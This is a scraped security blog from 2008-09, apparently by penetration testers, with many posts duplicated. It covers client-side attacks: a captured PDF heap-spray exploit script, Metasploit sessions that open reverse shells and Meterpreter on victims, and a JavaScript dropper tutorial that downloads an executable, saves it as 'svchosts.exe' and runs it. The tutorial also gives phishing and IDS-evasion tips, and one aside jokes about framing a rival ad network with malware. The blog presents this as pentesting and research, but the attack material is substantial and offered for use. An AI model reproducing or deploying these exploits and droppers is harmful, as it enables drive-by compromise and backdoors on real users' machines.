Here's the video from the Notacon talk. Audio sucks, sorry...blame the video guy.
Full Scope Security Attacking Layer 8: Client-Side Penetration Testing Notacon '09 Edition from FullScopeSecurity on Vimeo.
Showing posts with label client side attacks. Show all posts
Showing posts with label client side attacks. Show all posts
Wednesday, May 20, 2009
Monday, April 20, 2009
How do YOU defend against 0day?!
There is an interesting thread over on DailyDave about 0day and what you can do about it.
Its far from complete, so go read the thread and come back...
http://lists.immunitysec.com/pipermail/dailydave/2009-April/thread.html#5673
Thus far Ron Gula's response is the best.
My thoughts on this is that it really depends a lot on the maturity of the environment. Most environments wouldn't stand a chance against even a crappy targeted client-side attack with public vulnerabilities. If you throw in 0day...forget about it But assuming a mature environment, I think you use 0day to test your defenses to targeted and 0day attacks.
Does one 0day totally own your network?
I think using 0day allows you to test:
Are things segregated properly enough that someone popping a shell on a workstation cant get access to "what makes you money"?
Does you HIPS/HIDS stop that stack/heap overflow? Does it stop you from putting new binaries on the box for post exploitation?
Is your AV worth anything? How long before 0day(that eventually becomes public) becomes an AV alert?
Does your network IPS/IDS detect or block the exploit traffic?
Can you detect the outbound traffic? and RESPOND?!
Are your users running with elevated privileges or are your admins doing their regular work with their admin accounts?
that sort of thing...thoughts?
Its far from complete, so go read the thread and come back...
http://lists.immunitysec.com/pipermail/dailydave/2009-April/thread.html#5673
Thus far Ron Gula's response is the best.
My thoughts on this is that it really depends a lot on the maturity of the environment. Most environments wouldn't stand a chance against even a crappy targeted client-side attack with public vulnerabilities. If you throw in 0day...forget about it But assuming a mature environment, I think you use 0day to test your defenses to targeted and 0day attacks.
Does one 0day totally own your network?
I think using 0day allows you to test:
Are things segregated properly enough that someone popping a shell on a workstation cant get access to "what makes you money"?
Does you HIPS/HIDS stop that stack/heap overflow? Does it stop you from putting new binaries on the box for post exploitation?
Is your AV worth anything? How long before 0day(that eventually becomes public) becomes an AV alert?
Does your network IPS/IDS detect or block the exploit traffic?
Can you detect the outbound traffic? and RESPOND?!
Are your users running with elevated privileges or are your admins doing their regular work with their admin accounts?
that sort of thing...thoughts?
Back from Notacon
g0ne and I just got back from presenting on Client-Side Attacks at Notacon. You can check out his write up here. I have pretty much the same things to say.
It was definitely a unique con especially that it was more "everything tech" versus hardcore security...so like g0ne said we ended up with lots of down time in between talks we were interested in. We spent a bit of time in the lockpick village so that was fun. I usually don't have time to do that stuff because I have talks I want to see.
that's about it...
Up next ChicagoCon in May. I'll also be up there for the Social Engineering Master Class so I'm excited about that.
-CG
It was definitely a unique con especially that it was more "everything tech" versus hardcore security...so like g0ne said we ended up with lots of down time in between talks we were interested in. We spent a bit of time in the lockpick village so that was fun. I usually don't have time to do that stuff because I have talks I want to see.
that's about it...
Up next ChicagoCon in May. I'll also be up there for the Social Engineering Master Class so I'm excited about that.
-CG
Monday, March 16, 2009
Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition
Here's the video from our Client-Side talk at SOURCE Boston 2009
Full Scope Security Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition from FullScopeSecurity on Vimeo.
Full Scope Security Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition from FullScopeSecurity on Vimeo.
PDF Exploits now with Heapspray
So right after the latest Adobe 0-day was found in the wild and it was seen to be using heapspraying as part of the exploit and payload delivery I noticed a change in the other Abobe exploits doing the rounds. Both the Adobe printf() and collectEmailInfo() exploits are now taking advantage of heapspraying. I guess it makes sense considering that most, if not all, of the pdf exploits are being delivered via a link rather than an attachment. The browser will render the pdf within the window and so heapspraying will work nicely. This does limit it to IE though.
Another interesting change is that I'm seeing both exploit vectors in a single pdf. A quick visit to hxxp://skalty.com/qqa/paf.php returned a pdf with the following javascript:
----
function fix_it(yarsp, len)
{
while (yarsp.length*2
yarsp = yarsp.substring(0,len/2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8)
{
var payload = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9%u5824...snip...");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < block ="" mem =" new" i="0;i<1400;i++)">
var num = 12999999999999999999888888...snip...;
util.printf("%45000f",num);
}
else
{
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9....snip...");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count=0;countcount2;count++)
{
mem_array[count] = yarsp + addkk;
}
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length <>
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}
this.kasp]ac();
----
Nothing new really but it's always interesting to see how the exploits and their delivery mechanisms evolve.
Another interesting change is that I'm seeing both exploit vectors in a single pdf. A quick visit to hxxp://skalty.com/qqa/paf.php returned a pdf with the following javascript:
----
function fix_it(yarsp, len)
{
while (yarsp.length*2
yarsp = yarsp.substring(0,len/2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8)
{
var payload = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9%u5824...snip...");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < block ="" mem =" new" i="0;i<1400;i++)">
var num = 12999999999999999999888888...snip...;
util.printf("%45000f",num);
}
else
{
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9....snip...");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count=0;countcount2;count++)
{
mem_array[count] = yarsp + addkk;
}
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length <>
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}
this.kasp]ac();
----
Nothing new really but it's always interesting to see how the exploits and their delivery mechanisms evolve.
Monday, March 9, 2009
Presentation on Client-Side Attacks at SOURCE Boston
Alright its time for SOURCE Boston!
I'm happy to announce that g0ne and I will be there presenting on:
Attacking Layer 8: Client-Side Penetration Testing
We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments , how to use the metasploit framework to deliver client-side attacks with demos (yes other tools do CS attacks but we're poor), and some remediations for client-side attacks.
It will be an extra special big day because we'll be presenting as Full Scope Security, our new security consultancy. More on that later.
If you're not going to make it to SOURCE, we will also be at Notacon 16-19 April 09
http://www.notacon.org and ChicagoCon 8-9 May 09 http://www.chicagocon.com
I'm happy to announce that g0ne and I will be there presenting on:
Attacking Layer 8: Client-Side Penetration Testing
We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments , how to use the metasploit framework to deliver client-side attacks with demos (yes other tools do CS attacks but we're poor), and some remediations for client-side attacks.
It will be an extra special big day because we'll be presenting as Full Scope Security, our new security consultancy. More on that later.
If you're not going to make it to SOURCE, we will also be at Notacon 16-19 April 09
http://www.notacon.org and ChicagoCon 8-9 May 09 http://www.chicagocon.com
Friday, February 20, 2009
Wednesday, February 18, 2009
MS09_002 Memory Corruption Exploit
Details to follow. :-)
msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)
msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)
Wednesday, January 14, 2009
Serving Up Malware via Ad Networks
So nothing new to serve up exploits via ad networks but I thought it was cool that someone was serving up a pdf exploit via the Ad Network
From http://www.curse.com/forums/t/69161.aspx
"I was looking at GridManaBars when Avast popped up a virus, 3 times. Twice on the addon's page, and once on the download page. I just viewed the page again, but nothing there.
Here's Avast's log.
12/2/2008 7:11:31 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702&vis=1" file.
12/2/2008 7:11:31 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702" file.
12/2/2008 7:11:50 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702&vis=1" file. "
Url looks similar from what I recall, it's traced back to valuepromo.net. Ad banners I assume?
A robtex of that IP gives you two others in the valuepromo network
76.74.154.110 server2.valuepromo.net
76.74.239.45 server3.valuepromo.net
76.74.239.143 server1.valuepromo.net
http://www.robtex.com/dns/qiweroqw.com.html
google for those IPs and you'll see all kinds of people complaining about AV alerts and browser crashes.
The best stuff is here though
http://forums.techpowerup.com/showthread.php?t=81570
"
http://76.74.154.110/zyyqoeiwrueq/pdf.php?id=14273&vis=1
i'm sitting at techpowerup.com homepage and it takes me to this ^^ and brings me to a blank pdf document.... about 6 hours ago today, at techpowerup's homepage, it opened up acrobat reader (outside of firefox) with a blank document...."
Opens up a blank pdf, yeah that's not good...
On a more fun note, think of the damage you could do to competitor ad network by getting them to serve up malware and get their whole netblock blocked? good stuff.
From http://www.curse.com/forums/t/69161.aspx
"I was looking at GridManaBars when Avast popped up a virus, 3 times. Twice on the addon's page, and once on the download page. I just viewed the page again, but nothing there.
Here's Avast's log.
12/2/2008 7:11:31 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702&vis=1" file.
12/2/2008 7:11:31 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702" file.
12/2/2008 7:11:50 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702&vis=1" file. "
Url looks similar from what I recall, it's traced back to valuepromo.net. Ad banners I assume?
A robtex of that IP gives you two others in the valuepromo network
76.74.154.110 server2.valuepromo.net
76.74.239.45 server3.valuepromo.net
76.74.239.143 server1.valuepromo.net
http://www.robtex.com/dns/qiweroqw.com.html
google for those IPs and you'll see all kinds of people complaining about AV alerts and browser crashes.
The best stuff is here though
http://forums.techpowerup.com/showthread.php?t=81570
"
http://76.74.154.110/zyyqoeiwrueq/pdf.php?id=14273&vis=1
i'm sitting at techpowerup.com homepage and it takes me to this ^^ and brings me to a blank pdf document.... about 6 hours ago today, at techpowerup's homepage, it opened up acrobat reader (outside of firefox) with a blank document...."
Opens up a blank pdf, yeah that's not good...
On a more fun note, think of the damage you could do to competitor ad network by getting them to serve up malware and get their whole netblock blocked? good stuff.
Tuesday, January 13, 2009
Winzip FileView ActiveX Exploit
It's not new at all [CVE-2006-5198] but I noticed that MSF did not have any coverage for Winzip's vulnerable ActiveX methods and the PoC's that I found did not work for me so I put this together last night. The great thing about Winzip is that, like Adobe Acrobat, no one updates it. :-)
[1] WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX
So run 'svn update' and have fun.
Cheers,
/dean
[1] WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX
So run 'svn update' and have fun.
Cheers,
/dean
Thursday, January 8, 2009
More exploits pls.
mc committed 5 exploit modules, 2 browser & 3 fileformat, I'd put together to the metasploit trunk the other day. Just run 'svn update' to update your install with them. The five are:
[1] CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
[2] VeryPDF PDFView OpenPDF ActiveX OpenPDF Heap Overflow
[3] DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
[4] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
[5] SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
Cheers,
Dean
[1] CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
[2] VeryPDF PDFView OpenPDF ActiveX OpenPDF Heap Overflow
[3] DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
[4] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
[5] SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
Cheers,
Dean
Monday, January 5, 2009
How to digitally sign...
all kinds of things for your client side attack
http://blog.didierstevens.com/2009/01/05/howto-add-a-digital-signature-to-an-office-document/
http://blog.didierstevens.com/2009/01/04/howto-add-a-digital-signature-to-a-pdf-file/
http://blog.didierstevens.com/2008/12/31/howto-add-a-digital-signature-to-executables/
http://blog.didierstevens.com/2009/01/01/howto-add-a-digital-signature-to-a-firefox-add-on/
and how to make your own cert
http://blog.didierstevens.com/2008/12/30/howto-make-your-own-cert-with-openssl/
http://blog.didierstevens.com/2009/01/05/howto-add-a-digital-signature-to-an-office-document/
http://blog.didierstevens.com/2009/01/04/howto-add-a-digital-signature-to-a-pdf-file/
http://blog.didierstevens.com/2008/12/31/howto-add-a-digital-signature-to-executables/
http://blog.didierstevens.com/2009/01/01/howto-add-a-digital-signature-to-a-firefox-add-on/
and how to make your own cert
http://blog.didierstevens.com/2008/12/30/howto-make-your-own-cert-with-openssl/
Sunday, January 4, 2009
MSF VBA payload Demo
Pretty good demo by Mark Baggett using the MSF Payload with VBA output and creating a malicious word document.
http://markremark.blogspot.com/2009/01/metasploit-visual-basic-payloads-in.html
Its a shame everyone can do this now, its been ol'reliable for quite awhile :-(
http://markremark.blogspot.com/2009/01/metasploit-visual-basic-payloads-in.html
Its a shame everyone can do this now, its been ol'reliable for quite awhile :-(
Thursday, December 11, 2008
Internet Explorer 7 XML Parser Buffer Overflow
So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].
A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.
Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!
Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.
So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.
Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!
We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.
I guess I should do a video of the module since Chris has started that trend but in the interim...
msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >
[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >
Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!
Now all I need is a target... ;)
Cheers,
/dean
**edit
IE7 Zero Day Technical Analysis
A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.
Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!
Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.
So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.
Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!
We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.
I guess I should do a video of the module since Chris has started that trend but in the interim...
msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >
[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >
Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!
Now all I need is a target... ;)
Cheers,
/dean
**edit
IE7 Zero Day Technical Analysis
Friday, November 21, 2008
Metasploit Adobe util.printf() Client-side Exploit Video
A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.
Sorry, no audio. You'll just have to follow along.
Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.
**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.
Sorry, no audio. You'll just have to follow along.
Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.
**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.
Friday, November 14, 2008
Link: Writing malicious maros using metasploit
Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!
http://blogs.securiteam.com/index.php/archives/1161
of course those attacks can be mitigated with proper group policy but most places "need their macros!" so enjoy the pwnings.
http://blogs.securiteam.com/index.php/archives/1161
of course those attacks can be mitigated with proper group policy but most places "need their macros!" so enjoy the pwnings.
Wednesday, October 22, 2008
Malware targeting industrial control software(?)
So this morning I was doing my usual malware roundup and looking for anything new or vaguely interesting. Lots of the usual sites all serving the same thing. The pdf exploit (I've a special fondness for this one, see the pentesting failures post), the snapshot_viewer_activex exploit, ms08_053, realplayer11, ms08_011, ms06_014 and a few others. All pretty popular right now.
Then I saw a site that has been floating around serving up malware for a while now. It's been up for about a year I think. It's always had a nice index.htm page with a list of iframes serving up all of the above and some others. I generally have a quick look every now and again and find it's always the same stuff. Lots of reuse of exploits, etc...
Today was a surprise as I found something 'new'. The page has another exploit added. Nothing new about that but it's what the exploit is for that is surprising.
hxxp://www.wackystone.com/counter/IConics.htm
In August a stack overflow exploit in the Iconics Vessel ActiveX control was released. The exploit is in the dlgwrapper.dll [Dialog Wrapper Module ActiveX control]. Tebo and kf wrote a Metasploit exploit module for it. [http://www.milw0rm.com/exploits/6570].
Iconics makes plant automation software for various industries including oil, gas, pharma, airports, etc... SCADA anyone?
A quick decode of the ucs2 encoded payload reveals:
hxxp://www.wackystone.com/counter/taskmgr.exe
The exploit downloads taskmgr.exe, a dropper that installs a second stage piece of malware. I've not downloaded that as yet so I don't know the actual payload or it's function.
I guess what is interesting to me is that the malware authors have decided to use an exploit that has a somewhat small target audience. I could be wrong as I'm not that familiar with those industries and perhaps the software is really widespread.
/dean
Then I saw a site that has been floating around serving up malware for a while now. It's been up for about a year I think. It's always had a nice index.htm page with a list of iframes serving up all of the above and some others. I generally have a quick look every now and again and find it's always the same stuff. Lots of reuse of exploits, etc...
Today was a surprise as I found something 'new'. The page has another exploit added. Nothing new about that but it's what the exploit is for that is surprising.
hxxp://www.wackystone.com/counter/IConics.htm
In August a stack overflow exploit in the Iconics Vessel ActiveX control was released. The exploit is in the dlgwrapper.dll [Dialog Wrapper Module ActiveX control]. Tebo and kf wrote a Metasploit exploit module for it. [http://www.milw0rm.com/exploits/6570].
Iconics makes plant automation software for various industries including oil, gas, pharma, airports, etc... SCADA anyone?
A quick decode of the ucs2 encoded payload reveals:
hxxp://www.wackystone.com/counter/taskmgr.exe
The exploit downloads taskmgr.exe, a dropper that installs a second stage piece of malware. I've not downloaded that as yet so I don't know the actual payload or it's function.
I guess what is interesting to me is that the malware authors have decided to use an exploit that has a somewhat small target audience. I could be wrong as I'm not that familiar with those industries and perhaps the software is really widespread.
/dean
Wednesday, August 27, 2008
Owning the Client without an Exploit
So after a long hiatus of no posts I figured it was time to step up and post something that may be of interest to pentesters. In the spirit of continuity to some previous posts about client-side attacks and as a follow up to some discussions that Chris and I have been having, this post will be about Client-side Ownage.
It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?
Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.
What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Lets take a look at a JavaScript function to do just that.
First we need to create our object elements and the required attributes needed to download and execute the file we want:
function dropper() {
var x = document.createElement('object');
x.setAttribute('id','x');
x.setAttribute('classid','clsid:D96C556-65A3-11D0-983A-00C04FC29E36');
try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('ADODB.stream','');
We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.
We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.
Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.
The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.
Now let's grab the file, install it to a directory of our choice and run it.
try {
str.type = 1;
obj.open('GET','http://coolsite.com//innocent.exe',false);
obj.send();
str.open();
str.Write(obj.responseBody);
var path = './/..//svchosts.exe';
str.SaveToFile(path,2);
str.Close();
}
catch(e) {}
First we use the Type property to set the type of data in the stream object. 1 is for Binary.
Next we use the XMLHTTPRequest Open Method intialize an MSXML2.XMLHTTP request in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.
The ADODB.stream Open Method is used to create and open a Stream opject. The ADODB.stream Write Method is used to write the binary data to a binary Stream object. After specifying the path we now use the ADODB.stream SaveToFile method is used to save contents of our open Stream object to a local file of our choosing. In this case we use am option value of 2 that overwrites the file if it already exists. We then close the object.
The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.
try {
app.shellexecute(path);
}
catch(e) {}
}
catch(e) {}
}
Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.
You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.
One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.
Variants of this method we have just discussed are actually widely used by malware authors on their sites to drop files onto users systems. Have a look at the next spam email you get and decode the JavaScript on the page.
Cheers,
It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?
Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.
What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Lets take a look at a JavaScript function to do just that.
First we need to create our object elements and the required attributes needed to download and execute the file we want:
function dropper() {
var x = document.createElement('object');
x.setAttribute('id','x');
x.setAttribute('classid','clsid:D96C556-65A3-11D0-983A-00C04FC29E36');
try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('ADODB.stream','');
